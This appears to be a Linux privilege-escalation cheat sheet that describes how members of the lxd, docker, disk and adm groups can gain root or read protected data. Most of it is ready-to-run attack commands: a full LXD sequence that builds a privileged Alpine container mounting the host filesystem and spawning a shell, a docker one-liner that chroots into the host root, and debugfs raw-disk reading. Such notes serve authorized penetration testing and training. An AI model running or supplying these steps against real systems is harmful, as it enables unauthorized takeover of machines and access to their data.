PRIMARY CATEGORY → LINUX PRIVESC
Enumeration
id
groups "$USER"LXC | LXD
Manual Exploitation
Downloading the Build Alpine
From the Attacker ⚔️
curl --silent --location --request GET 'https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine' --remote-nameBuilding Alpine
From the Attacker ⚔️
bash ./build-alpineCreating the Container
lxd initlxc image import <ALPINE_TAR_GZ> --alias alpinelxc init alpine privesc -c security.privileged=truelxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=truelxc start privesclxc exec privesc sh # Or lxc exec privesc /bin/bashExploitDB
Downloading the Build Alpine
From the Attacker ⚔️
curl --silent --location --request GET 'https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine' --remote-nameBuilding Alpine
From the Attacker ⚔️
bash ./build-alpineRunning the Exploit
From the Target 🎯
bash script.bashOnce inside the container, just go to /mnt/root to see all resources from the host machine
Docker
If the current user belongs to the docker group, we can spawn new docker containers and compromise the entire machine using volumes by mounting the system root / on the container’s /mnt directory
This is because, by default, both ROOT user and the Docker group have write permissions over the Docker Daemon’s Socket
Therefore, a member of the Docker group can use the docker command ( Docker Client ) to send requests to the Docker Daemon’s API REST without receiving an access denied error
Alternatively, Docker may have SUID set or the current user is in the sudoers file
In any case, we can create a Docker Container with a bind mount so that the host’s file system is accesible from the container
docker run --volume /:/mnt --rm --interactive --tty ubuntu chroot /mnt /bin/bashTo interact with the Docker Daemon’s Socket, see Abusing Docker Sockets
Disk
Members of this group have full access to any existing device within /dev, which means that file system permissions are ignored, so we can read the entire file system from the raw disk
To do so, we use debugfs
debugfs <DISK> # debugfs /dev/sda1ADM
Users belonging to this group can read all logs stored within /var/log/ directory, so an attacker could gather sensitive data stored in log files